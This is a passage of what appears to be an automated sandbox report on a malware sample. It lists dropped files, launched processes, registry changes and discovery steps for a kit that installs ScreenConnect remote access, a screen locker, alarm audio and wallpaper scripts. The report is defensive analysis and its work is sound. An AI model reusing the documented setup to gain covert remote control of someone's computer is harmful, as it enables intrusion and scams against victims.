PC 4\is-D3RN2.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\is-8GTT1.tmp Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\LockScreens\lockscreen3.bmp ScreenConnect.WindowsFileManager.exe -
Drops file in Windows directory 28 IoCs
Processes:
ScreenConnect.WindowsClient.exedescription ioc Process File opened for modification C:\Windows\Audio.bat ScreenConnect.WindowsClient.exe File created C:\Windows\nircmd.exe ScreenConnect.WindowsClient.exe File created C:\Windows\Volume 100%.vbs ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\Temp\Lock PC.exe ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\hicn.bat ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\nircmd.exe ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\Volume 100%.vbs ScreenConnect.WindowsClient.exe File created C:\Windows\ATerror.mp3 ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\ATerror.mp3 ScreenConnect.WindowsClient.exe File created C:\Windows\ATTranfer.bat ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\ATwall.jpg ScreenConnect.WindowsClient.exe File created C:\Windows\Audio.bat ScreenConnect.WindowsClient.exe File created C:\Windows\hicn.bat ScreenConnect.WindowsClient.exe File created C:\Windows\wallpaper.vbs ScreenConnect.WindowsClient.exe File created C:\Windows\ATAlert.vbs ScreenConnect.WindowsClient.exe File created C:\Windows\callAud.vbs ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\www.txt ScreenConnect.WindowsClient.exe File created C:\Windows\ATwall.jpg ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\callAud.vbs ScreenConnect.WindowsClient.exe File created C:\Windows\nircmdc.exe ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\wallpaper.vbs ScreenConnect.WindowsClient.exe File created C:\Windows\NirCmd.chm ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\nircmdc.exe ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\ATTranfer.bat ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\NirCmd.chm ScreenConnect.WindowsClient.exe File created C:\Windows\www.txt ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\ATAlert.vbs ScreenConnect.WindowsClient.exe File created C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\Temp\Lock PC.exe ScreenConnect.WindowsClient.exe -
Executes dropped EXE 17 IoCs
Processes:
ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exeScreenConnect.ClientService.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsBackstageShell.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exeLock PC.exeLock PC.tmplockpc.exelockpc.exeLmpcServ.exeScreenConnect.WindowsFileManager.exeScreenConnect.WindowsFileManager.exepid Process 3488 ScreenConnect.WindowsClient.exe 4208 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 4640 ScreenConnect.WindowsClient.exe 4140 ScreenConnect.WindowsClient.exe 3020 ScreenConnect.WindowsClient.exe 2692 ScreenConnect.WindowsClient.exe 704 ScreenConnect.WindowsBackstageShell.exe 208 ScreenConnect.WindowsClient.exe 828 ScreenConnect.WindowsClient.exe 620 Lock PC.exe 3648 Lock PC.tmp 116 lockpc.exe 60 lockpc.exe 1536 LmpcServ.exe 3044 ScreenConnect.WindowsFileManager.exe 4472 ScreenConnect.WindowsFileManager.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid Process 2596 sc.exe 4752 sc.exe 1416 sc.exe -
Loads dropped DLL 17 IoCs
Processes:
ScreenConnect.ClientService.exeScreenConnect.ClientService.exelockpc.exepid Process 4208 ScreenConnect.ClientService.exe 4208 ScreenConnect.ClientService.exe 4208 ScreenConnect.ClientService.exe 4208 ScreenConnect.ClientService.exe 4208 ScreenConnect.ClientService.exe 4208 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 1280 ScreenConnect.ClientService.exe 60 lockpc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 5004 2592 WerFault.exe 82 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Lock PC.exeLock PC.tmpsc.exelockpc.exelockpc.exee310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exeScreenConnect.ClientService.exeScreenConnect.ClientService.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lock PC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lock PC.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lockpc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lockpc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
ScreenConnect.WindowsClient.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
ScreenConnect.WindowsClient.exeScreenConnect.WindowsFileManager.exeScreenConnect.WindowsFileManager.exeScreenConnect.WindowsClient.exeLock PC.tmplockpc.exeScreenConnect.WindowsBackstageShell.exeScreenConnect.WindowsClient.exelockpc.exeScreenConnect.ClientService.exeScreenConnect.WindowsClient.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f0eec59f-0000-0000-0000-d01200000000}\MaxCapacity = "14116" ScreenConnect.WindowsFileManager.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon\ = "%SystemRoot%\\System32\\imageres.dll,-54" ScreenConnect.WindowsFileManager.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 0100000000000000416005e64430db01 ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\FSPro Labs\Lock My PC 4\edImageFileName = "C:\\Program Files\\Lock My PC 4\\LockScreens\\lockscreen5_b.gif" Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software lockpc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f0eec59f-0000-0000-0000-f0ff3a000000}\MaxCapacity = "2047" ScreenConnect.WindowsFileManager.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9925 = "MP3 Format Sound" ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = aa9865e08f1ca808cb842e9a53d03a3bda7456dd8bc53770b3f7606b417da386 Lock PC.tmp Set value (int) \REGISTRY\USER\.DEFAULT\Software\FSPro Labs\Lock My PC 4\Installer = "1" Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ScreenConnect.WindowsFileManager.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Mouse\MouseHoverTime = "750" ScreenConnect.WindowsBackstageShell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU\ ScreenConnect.WindowsFileManager.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\CIDOpen\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInner = 9c000000980000003153505305d5cdd59c2e1b10939708002b2cf9ae3b0000002a000000004e0061007600500061006e0065005f004300460044005f0046006900720073007400520075006e0000000b000000000000004100000030000000004e0061007600500061006e0065005f00530068006f0077004c00690062007200610072007900500061006e00650000000b000000ffff00000000000000000000 ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Lock PC.tmp Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = 47624632ca0bff1ecec64e4e95b0c2185e771ca2e7659eae48bfcc1c95183e70 Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software\FSPro Labs\Lock My PC 4 lockpc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList ScreenConnect.WindowsFileManager.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32 ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\CIDSizeMRU\0 = 530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e00650078006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003c00000053000000ad02000033020000000000000000000000000000000000000100000000000000 ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFiles0000 = 43003a005c00500072006f006700720061006d002000460069006c00650073005c004c006f0063006b0020004d007900200050004300200034005c006c006f0063006b00700063002e00650078006500000043003a005c00500072006f006700720061006d002000460069006c00650073005c004c006f0063006b0020004d007900200050004300200034005c006c006f0063006b00630070002e00650078006500000043003a005c00500072006f006700720061006d002000460069006c00650073005c004c006f0063006b0020004d007900200050004300200034005c004c006d007000630053006500720076002e00650078006500000043003a005c00570069006e0064006f00770073005c005300790073006e00610074006900760065005c006600730070005f006c006d0077006c002e0064006c006c00000043003a005c00500072006f006700720061006d002000460069006c00650073005c004c006f0063006b0020004d007900200050004300200034005c004c006f0063006b004c00690062002e0064006c006c00000043003a005c00500072006f006700720061006d002000460069006c00650073005c004c006f0063006b0020004d007900200050004300200034005c006c006f0063006b006d007900700063002e00630068006d0000000000 Lock PC.tmp Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts ScreenConnect.WindowsFileManager.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsBackstageShell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\CIDSizeMRU\ ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4802 = "VBScript Script File" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f0eec59f-0000-0000-0000-f0ff3a000000} ScreenConnect.WindowsFileManager.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-9216 = "This PC" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Modules ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\CIDSizeMRU\ ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager Lock PC.tmp Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software ScreenConnect.WindowsFileManager.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\WindowMetrics\MinHorzGap = "0" ScreenConnect.WindowsBackstageShell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000050d963e74430db01 ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Sequence = "1" Lock PC.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f0eec59f-0000-0000-0000-d01200000000}\NeedToPurge = "1" ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU\MRUListEx = ffffffff ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion ScreenConnect.WindowsFileManager.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedState = 04000000160014001f80cb859f6720028040b29b5540cc05aab60000010000004d0000001c00000031535053a66a63283d95d211b5d600c04fd918d0000000002d00000031535053357ec777e31b5043a48c7563d727776d1100000002000000000b000000ffff00000000000000000000160014001f60983ffbb4eac18d42a78ad1f5659cba930000010000004d0000001c00000031535053a66a63283d95d211b5d600c04fd918d0000000002d00000031535053357ec777e31b5043a48c7563d727776d1100000002000000000b000000ffff00000000000000000000160014001f580d1a2cf021be504388b07367fc96ef3c0000010000004d0000001c00000031535053a66a63283d95d211b5d600c04fd918d0000000002d00000031535053357ec777e31b5043a48c7563d727776d1100000002000000000b000000000000000000000000000000160014001f50e04fd020ea3a6910a2d808002b30309d0000010000004d0000001c00000031535053a66a63283d95d211b5d600c04fd918d0000000002d00000031535053357ec777e31b5043a48c7563d727776d1100000002000000000b000000ffff00000000000000000000 ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer ScreenConnect.WindowsFileManager.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows ScreenConnect.WindowsFileManager.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe -
Modifies registry class 64 IoCs
Processes:
lockpc.exedfsvc.exelockpc.exeScreenConnect.WindowsClient.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B75E1FB5-0E99-4365-9140-A7B4B1D230E9}\LocalServer32 lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\Files dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\identity = 68747470733a2f2f6b6f696465736661632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 dfsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56C8F6C1-A45F-4F02-E69D-298C5F597190}\Programmable lockpc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0CE9B48A-9CB6-6845-B71D-4FFD8A3AC382}\1.0\HELPDIR\ lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 = 68747470733a2f2f6b6f696465736661632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe dfsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56C8F6C1-A45F-4F02-E69D-298C5F597190}\Version\ = "4.0" lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\SizeOfStronglyNamedComponent = d954090000000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\Transform = 01 dfsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56C8F6C1-A45F-4F02-E69D-298C5F597190}\ProgID\ lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 0000 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\Files dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\lock!1100000030b6570eac080000cc0d000000000000000000004ecbe = 30303030303861632c30316462333034346430623233303931 dfsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0CE9B48A-9CB6-6845-B71D-4FFD8A3AC382}\1.0\0 lockpc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B75E1FB5-0E99-4365-9140-A7B4B1D230E9}\LocalServer32\ = "C:\\PROGRA~1\\LOCKMY~1\\lockpc.exe" lockpc.exe Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1} dfsvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0CE9B48A-9CB6-6845-B71D-4FFD8A3AC382} lockpc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 460061006c00730065000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\Files\ScreenConnect.Core.dll_b96889d378047e27 = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\lock!16000000dcb6570ea00d0000f00600000000000000000000 = 30303030306461302c30316462333034346432663338663565 ScreenConnect.WindowsClient.exe Set value (str) 